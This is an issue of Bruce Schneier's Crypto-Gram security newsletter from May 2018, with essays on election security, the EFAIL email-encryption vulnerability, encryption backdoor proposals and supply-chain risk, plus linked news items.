Crypto-Gram

May 15, 2018

by Bruce Schneier
CTO, IBM Resilient
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <https://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <https://www.schneier.com/crypto-gram/archives/2018/…>. These same essays and news items appear in the “Schneier on Security” blog at <https://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:


Securing Elections

Elections serve two purposes. The first, and obvious, purpose is to accurately choose the winner. But the second is equally important: to convince the loser. To the extent that an election system is not transparently and auditably accurate, it fails in that second purpose. Our election systems are failing, and we need to fix them.

Today, we conduct our elections on computers. Our registration lists are in computer databases. We vote on computerized voting machines. And our tabulation and reporting is done on computers. We do this for a lot of good reasons, but a side effect is that elections now have all the insecurities inherent in computers. The only way to reliably protect elections from both malice and accident is to use something that is not hackable or unreliable at scale; the best way to do that is to back up as much of the system as possible with paper.

Recently, there have been two graphic demonstrations of how bad our computerized voting system is. In 2007, the states of California and Ohio conducted audits of their electronic voting machines. Expert review teams found exploitable vulnerabilities in almost every component they examined. The researchers were able to undetectably alter vote tallies, erase audit logs, and load malware on to the systems. Some of their attacks could be implemented by a single individual with no greater access than a normal poll worker; others could be done remotely.

Last year, the Defcon hackers’ conference sponsored a Voting Village. Organizers collected 25 pieces of voting equipment, including voting machines and electronic poll books. By the end of the weekend, conference attendees had found ways to compromise every piece of test equipment: to load malicious software, compromise vote tallies and audit logs, or cause equipment to fail.

It’s important to understand that these were not well-funded nation-state attackers. These were not even academics who had been studying the problem for weeks. These were bored hackers, with no experience with voting machines, playing around between parties one weekend.

It shouldn’t be any surprise that voting equipment, including voting machines, voter registration databases, and vote tabulation systems, are that hackable. They’re computers—often ancient computers running operating systems no longer supported by the manufacturers—and they don’t have any magical security technology that the rest of the industry isn’t privy to. If anything, they’re less secure than the computers we generally use, because their manufacturers hide any flaws behind the proprietary nature of their equipment.

We’re not just worried about altering the vote. Sometimes causing widespread failures, or even just sowing mistrust in the system, is enough. And an election whose results are not trusted or believed is a failed election.

Voting systems have another requirement that makes security even harder to achieve: the requirement for a secret ballot. Because we have to securely separate the election-roll system that determines who can vote from the system that collects and tabulates the votes, we can’t use the security systems available to banking and other high-value applications.

We can securely bank online, but can’t securely vote online. If we could do away with anonymity—if everyone could check that their vote was counted correctly—then it would be easy to secure the vote. But that would lead to other problems. Before the US had the secret ballot, voter coercion and vote-buying were widespread.

We can’t, so we need to accept that our voting systems are insecure. We need an election system that is resilient to the threats. And for many parts of the system, that means paper.

Let’s start with the voter rolls. We know they’ve already been targeted. In 2016, someone changed the party affiliation of hundreds of voters before the Republican primary. That’s just one possibility. A well-executed attack that deletes, for example, one in five voters at random—or changes their addresses—would cause chaos on election day.

Yes, we need to shore up the security of these systems. We need better computer, network, and database security for the various state voter organizations. We also need to better secure the voter registration websites, with better design and better internet security. We need better security for the companies that build and sell all this equipment.

Multiple, unchangeable backups are essential. A record of every addition, deletion, and change needs to be stored on a separate system, on write-only media like a DVD. Copies of that DVD, or—even better—a paper printout of the voter rolls, should be available at every polling place on election day. We need to be ready for anything.

Next, the voting machines themselves. Security researchers agree that the gold standard is a voter-verified paper ballot. The easiest (and cheapest) way to achieve this is through optical-scan voting. Voters mark paper ballots by hand; they are fed into a machine and counted automatically. That paper ballot is saved, and serves as a final true record in a recount in case of problems. Touch-screen machines that print a paper ballot to drop in a ballot box can also work for voters with disabilities, as long as the ballot can be easily read and verified by the voter.

Finally, the tabulation and reporting systems. Here again we need more security in the process, but we must always use those paper ballots as checks on the computers. A manual, post-election, risk-limiting audit varies the number of ballots examined according to the margin of victory. Conducting this audit after every election, before the results are certified, gives us confidence that the election outcome is correct, even if the voting machines and tabulation computers have been tampered with. Additionally, we need better coordination and communications when incidents occur.

It’s vital to agree on these procedures and policies before an election. Before the fact, when anyone can win and no one knows whose votes might be changed, it’s easy to agree on strong security. But after the vote, someone is the presumptive winner—and then everything changes. Half of the country wants the result to stand, and half wants it reversed. At that point, it’s too late to agree on anything.

The politicians running in the election shouldn’t have to argue their challenges in court. Getting elections right is in the interest of all citizens. Many countries have independent election commissions that are charged with conducting elections and ensuring their security. We don’t do that in the US.

Instead, we have representatives from each of our two parties in the room, keeping an eye on each other. That provided acceptable security against 20th-century threats, but is totally inadequate to secure our elections in the 21st century. And the belief that the diversity of voting systems in the US provides a measure of security is a dangerous myth, because a few districts can be decisive and there are so few voting-machine vendors.

We can do better. In 2017, the Department of Homeland Security declared elections to be critical infrastructure, allowing the department to focus on securing them. On 23 March, Congress allocated $380m to states to upgrade election security.

These are good starts, but don’t go nearly far enough. The constitution delegates elections to the states but allows Congress to “make or alter such Regulations.” In 1845, Congress set a nationwide election day. Today, we need it to set uniform and strict election standards.

This essay originally appeared in the “Guardian.”
https://www.theguardian.com/commentisfree/2018/apr/…

2007 audits:
http://www.sos.ca.gov/elections/voting-systems/…
https://www.eac.gov/assets/1/28/everest.pdf

Defcon Voting Village:
https://www.defcon.org/images/defcon-25/…

Verified Voting on ancient voting machines:
https://www.verifiedvoting.org/resources/…

Verified Voting on online voting:
https://www.verifiedvoting.org/resources/…

Voting rolls targeted:
https://www.nbcnews.com/storyline/…

Instance of party affiliation being changed:
http://www.pe.com/articles/…

Belfer Center publication on election security:
https://www.belfercenter.org/sites/default/files/…

Security of voter registration websites:
https://gcn.com/articles/2018/03/28/…
https://techscience.org/a/2017090601/

Hacking voting machine vendors:
https://www.csoonline.com/article/3267625/security/…

Nicholas Weaver on unchangeable backup systems:
https://www.lawfareblog.com/…

The need for a voter-verified paper ballot:
https://votingmachines.procon.org/view.answers.php?…

The need for a risk-limiting audit:
https://www.stat.berkeley.edu/~stark/Preprints/…
https://www.verifiedvoting.org/resources/…

Coordination and communications for election officials:
https://www.belfercenter.org/sites/default/files/…

Excellent testimonies on election security:
http://www.crypto.com/papers/…
https://jhalderm.com/pub/misc/…
https://www.verifiedvoting.org/wp-content/uploads/…

Voting systems as critical infrastructure:
https://www.politico.com/story/2017/01/…

2018 budget allocation for election security:
https://www.reuters.com/article/…

Two final essays:
https://slate.com/news-and-politics/2018/02/…
https://www.washingtonpost.com/news/posteverything/…


Details on a New PGP Vulnerability

A new PGP vulnerability was announced yesterday. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with this announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

https://efail.de/

https://motherboard.vice.com/en_us/article/3k4nd9/…
https://it.slashdot.org/story/18/05/14/149222/…


News

The Center for Democracy and Technology has a good summary of the current state of the DMCA’s chilling effects on security research.
https://cdt.org//…
Note: I am a signatory on the letter supporting unrestricted security research.
https://cdt.org/insight/…

Turns out it’s easy to hijack emergency sirens with a radio transmitter.
https://gizmodo.com/…

An interesting idea: oblivious DNS.
https://odns.cs.princeton.edu/
https://www.techrepublic.com/article/…

Police in the UK were able to read a fingerprint from a photo of a hand:
http://www.bbc.com/news/uk-wales-43711477?…

This acoustic technology identifies individuals by their ear shapes. No information about either false positives or false negatives.
https://www.nec.com/en/press/201802/…

Russia has banned the secure messaging app Telegram. It’s making an absolute mess of the ban—blocking 16 million IP addresses, many belonging to the Amazon and Google clouds—and it’s not even clear that it’s working. But, more importantly, I’m not convinced Telegram is secure in the first place.
https://www.tomshardware.com/news/…
https://www.techdirt.com/articles/20180417/…
https://www.theverge.com/2018/4/17/17246150/…
https://gizmodo.com/…
Such a weird story. If you want secure messaging, use Signal. If you’re concerned that having Signal on your phone will itself arouse suspicion, use WhatsApp.

“Do Not Disturb” is a Macintosh app that send an alert when the lid is opened. The idea is to detect computer tampering.
https://objective-see.com/products/dnd.html
https://www.wired.com/story/…

Info on the coded signals used by the Colorado Rockies baseball team.
https://www.fangraphs.com/s/…

Lt. Gen. Paul Nakasone has been confirmed as the new head of the NSA and US Cyber Command. I know nothing about him.
https://www.politico.com/story/2018/04/24/…
https://www.politico.com/story/2018/02/13/…

This seems like an epic security failure for TSB Bank:
https://www.schneier.com/blog/archives/2018/04/…
https://www.nakedcapitalism.com/2018/04/…

Researchers have disclosed a massive vulnerability in the VingCard electronic lock system, used in hotel rooms around the world. Patching is a nightmare. It requires updating the firmware on every lock individually.
https://www.zdnet.com/article/…
https://www.wired.com/story/…
https://it.slashdot.org/story/18/04/25/1451253/…

Researchers at Princeton University have released IoT Inspector, a tool that analyzes the security and privacy of IoT devices by examining the data they send across the Internet. They’ve already used the tool to study a bunch of different IoT devices. Their first two findings are “Many IoT devices lack basic encryption and authentication” and “User behavior can be inferred from encrypted IoT device traffic.” No surprises there.
https://freedom-to-tinker.com/2018/04/23/…
https://iot-inspector.princeton.edu/
https://boingboing.net/2018/04/23/promiscuous-mode.html

IoT Hall of Shame:
https://codecurmudgeon.com/wp/iot-hall-shame/

NIST issues a call for “lightweight cryptography algorithms”:
https://www.nist.gov/news-events/news/2018/04/…

LC4: another pen-and-paper symmetric cipher.
https://eprint.iacr.org/2017/339
https://news.ycombinator.com/item?id=16586257
Almost two decades ago, I designed Solitaire, a pen-and-paper cipher that uses a deck of playing cards to store the cipher’s state. This algorithm uses specialized tiles. This gives the cipher designer more options, but it can be incriminating in a way that regular playing cards are not. Still, I like seeing more designs like this.
https://www.schneier.com/academic/solitaire/

Micah Lee ran a two-year experiment designed to detect whether or not his laptop was ever tampered with. The results are inconclusive, but demonstrate how difficult it can be to detect laptop tampering.
https://theintercept.com/2018/04/28/…

This survey and report concludes that the US is unprepared for election-related hacking in 2018:
https://shorensteincenter.org/…
Security is never something we actually want. Security is something we need in order to avoid what we don’t want. It’s also more abstract, concerned with hypothetical future possibilities. Of course it’s lower on the priorities list than fundraising and press coverage. They’re more tangible, and they’re more immediate.

This article says that the Virginia Beach police are looking to buy encrypted radios. Someone should ask them if they want those radios to have a backdoor.
https://apnews.com/1a35310fb6aa440a81fe8ae3da5afbed

New research: “Leaving on a jet plane: the trade in fraudulently obtained airline tickets:”
https://link.springer.com/article/10.1007/…
https://www.lightbluetouchpaper.org/2018/05/09/…


Two NSA Algorithms Rejected by the ISO

The ISO has rejected two symmetric encryption algorithms: SIMON and SPECK. These algorithms were both designed by the NSA and made public in 2013. They are optimized for small and low-cost processors like IoT devices.

The risk of using NSA-designed ciphers, of course, is that they include NSA-designed backdoors. Personally, I doubt that they’re backdoored. And I always like seeing NSA-designed cryptography (particularly its key schedules). It’s like examining alien technology.

https://www.wikitribune.com/story/2018/04/20/…
https://twitter.com/TomerAshur/status/…

SIMON and SPECK:
https://eprint.iacr.org/2013/404.pdf
https://www.schneier.com/blog/archives/2013/07/…


Ray Ozzie’s Encryption Backdoor

Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It’s a weird article. It paints Ozzie’s proposal as something that “attains the impossible” and “satisfies both law enforcement and privacy purists,” when (1) it’s barely a proposal, and (2) it’s essentially the same key escrow scheme we’ve been hearing about for decades.

Basically, each device has a unique public/private key pair and a secure processor. The public key goes into the processor and the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That’s basically it.

I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won’t be able to secure that database of backdoor keys, (2) we don’t know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That’s actually the easy part. The hard part is ensuring that it’s only used by the good guys, and there’s nothing in Ozzie’s proposal that addresses any of that.

I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we’ll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it’s possible to design one of these things securely.

Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claimed that the report—and a related “New York Times” story—”undermine the argument that secure third-party access systems are so implausible that it’s not even worth trying to develop them.” Susan Landau effectively corrected this misconception, but the damage is done.

Here’s the thing: it’s not hard to design and build a backdoor. What’s hard is building the systems—both technical and procedural—around them. Here’s Rob Graham:

He’s only solving the part we already know how to solve. He’s deliberately ignoring the stuff we don’t know how to solve. We know how to make backdoors, we just don’t know how to secure them.

A bunch of us cryptographers have already explained why we don’t think this sort of thing will work in the foreseeable future. In “Keys Under Doormats,” We write:

Exceptional access would force Internet system developers to reverse “forward secrecy” design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today’s Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.

Finally, Matthew Green:

The reason so few of us are willing to bet on massive-scale key escrow systems is that *we’ve thought about it and we don’t think it will work*. We’ve looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there’s no detection system for key theft, there’s no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We’re not going to put the data of a few billion people on the line an environment where we *believe with high probability* that the system will fail.

Article on Ozzie’s scheme:
https://www.wired.com/story/…

Reactions to it:
https://.cryptographyengineering.com/2018/04/26/…
https://.erratasec.com/2018/04/…
https://www.cs.columbia.edu/~smb//2018-04/…
https://cyberlaw.stanford.edu//2018/04/…
https://www.zdnet.com/article/…

Justice Department is again pushing backdoors:
https://www.nytimes.com/2018/03/24/us/politics/…

National Academies report:
https://www.nap.edu/catalog/25010/…

Rozenshtein post:
https://www.lawfareblog.com/…

Related “New York Times” story:
https://www.nytimes.com/2018/03/24/us/politics/…

Landau correction:
https://www.lawfareblog.com/…

“Keys Under Doormats” paper:
https://www.schneier.com/academic/paperfiles/…

An analysis of the proposal:
https://mice.cs.columbia.edu/getTechreport.php?…
https://arstechnica.com/information-technology/2018/…


Schneier News

I am speaking at several different panels at RightsCon in Toronto on 5/16-18.
https://www.rightscon.org/toronto/

I am speaking at the Paranoia conference in Oslo on 5/29.
https://paranoia.watchcom.no/

I am speaking at CyCon X in Tallinn on 5/31.
https://ccdcoe.org/cycon/frontpage.html


Supply-Chain Security

Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users.

It’s a legitimate fear, and perhaps a prudent action. But it’s just one instance of the much larger issue of securing our supply chains.

All of our computerized systems are deeply international, and we have no choice but to trust the companies and governments that touch those systems. And while we can ban a few specific products, services or companies, no country can isolate itself from potential foreign interference.

In this specific case, the Pentagon is concerned that the Chinese government demanded that ZTE and Huawei add “backdoors” to their phones that could be surreptitiously turned on by government spies or cause them to fail during some future political conflict. This tampering is possible because the software in these phones is incredibly complex. It’s relatively easy for programmers to hide these capabilities, and correspondingly difficult to detect them.

This isn’t the first time the United States has taken action against foreign software suspected to contain hidden features that can be used against us. Last December, President Trump signed into law a bill banning software from the Russian company Kaspersky from being used within the US government. In 2012, the focus was on Chinese-made Internet routers. Then, the House Intelligence Committee concluded: “Based on available classified and unclassified information, Huawei and ZTE cannot be trusted to be free of foreign state influence and thus pose a security threat to the United States and to our systems.”

Nor is the United States the only country worried about these threats. In 2014, China reportedly banned antivirus products from both Kaspersky and the US company Symantec, based on similar fears. In 2017, the Indian government identified 42 smartphone apps that China subverted. Back in 1997, the Israeli company Check Point was dogged by rumors that its government added backdoors into its products; other of that country’s tech companies have been suspected of the same thing. Even al-Qaeda was concerned; ten years ago, a sympathizer released the encryption software Mujahedeen Secrets, claimed to be free of Western influence and backdoors. If a country doesn’t trust another country, then it can’t trust that country’s computer products.

But this trust isn’t limited to the country where the company is based. We have to trust the country where the software is written—and the countries where all the components are manufactured. In 2016, researchers discovered that many different models of cheap Android phones were sending information back to China. The phones might be American-made, but the software was from China. In 2016, researchers demonstrated an even more devious technique, where a backdoor could be added at the computer chip level in the factory that made the chips—without the knowledge of, and undetectable by, the engineers who designed the chips in the first place. Pretty much every US technology company manufactures its hardware in countries such as Malaysia, Indonesia, China and Taiwan.

We also have to trust the programmers. Today’s large software programs are written by teams of hundreds of programmers scattered around the globe. Backdoors, put there by we-have-no-idea-who, have been discovered in Juniper firewalls and D-Link routers, both of which are US companies. In 2003, someone almost slipped a very clever backdoor into Linux. Think of how many countries’ citizens are writing software for Apple or Microsoft or Google.

We can go even farther down the rabbit hole. We have to trust the distribution systems for our hardware and software. Documents disclosed by Edward Snowden showed the National Security Agency installing backdoors into Cisco routers being shipped to the Syrian telephone company. There are fake apps in the Google Play store that eavesdrop on you. Russian hackers subverted the update mechanism of a popular brand of Ukrainian accounting software to spread the NotPetya malware.

In 2017, researchers demonstrated that a smartphone can be subverted by installing a malicious replacement screen.

I could go on. Supply-chain security is an incredibly complex problem. US-only design and manufacturing isn’t an option; the tech world is far too internationally interdependent for that. We can’t trust anyone, yet we have no choice but to trust everyone. Our phones, computers, software and cloud systems are touched by citizens of dozens of different countries, any one of whom could subvert them at the demand of their government. And just as Russia is penetrating the US power grid so they have that capability in the event of hostilities, many countries are almost certainly doing the same thing at the consumer level.

We don’t know whether the risk of Huawei and ZTE equipment is great enough to warrant the ban. We don’t know what classified intelligence the United States has, and what it implies. But we do know that this is just a minor fix for a much larger problem. It’s doubtful that this ban will have any real effect. Members of the military, and everyone else, can still buy the phones. They just can’t buy them on US military bases. And while the US might block the occasional merger or acquisition, or ban the occasional hardware or software product, we’re largely ignoring that larger issue. Solving it borders on somewhere between incredibly expensive and realistically impossible.

Perhaps someday, global norms and international treaties will render this sort of device-level tampering off-limits. But until then, all we can do is hope that this particular arms race doesn’t get too far out of control.

This essay previously appeared in the “Washington Post.”
https://www.washingtonpost.com/news/posteverything/…

US military stops selling ZTE phones:
https://www.washingtonpost.com/news/the-switch/wp/…

Kaspersky ban:
https://www.reuters.com/article/…

2012 House Intelligence Committee report:
https://intelligence.house.gov/sites/…

China’s ban:
https://www.zdnet.com/article/…

India’s report:
https://www.indiatimes.com/technology/news/…

Rumors about Check Point:
http://old.greatcircle.com/firewalls/mhonarc/…

Mujahedeen Secrets:
https://www.schneier.com/blog/archives/2008/02/…

2016 Android backdoor
https://www.nytimes.com/2016/11/16/us/politics/…

2016 chip-level backdoor:
https://www.wired.com/2016/06/…

Backdoor in Juniper firewalls:
https://www.wired.com/2015/12/…

Backdoor in D-Link routers:
http://www.infoworld.com/article/2612384/…

Linux almost backdoor:
https://freedom-to-tinker.com/2013/10/09/…

Fake apps in Google Play s tore:
http://abcnews.go.com/US/…

Russian subversion of an update mechanism:
https://www.wired.com/story/…

Adding a smartphone backdoor via a malicious replacement screen:
https://arstechnica.com/information-technology/2017/…

Russian hackers penetrating the US power grid:
https://www.nytimes.com/2018/03/15/us/politics/…


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <https://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and CTO of IBM Resilient and Special Advisor to IBM Security. See <https://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of IBM Resilient.

Copyright (c) 2018 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.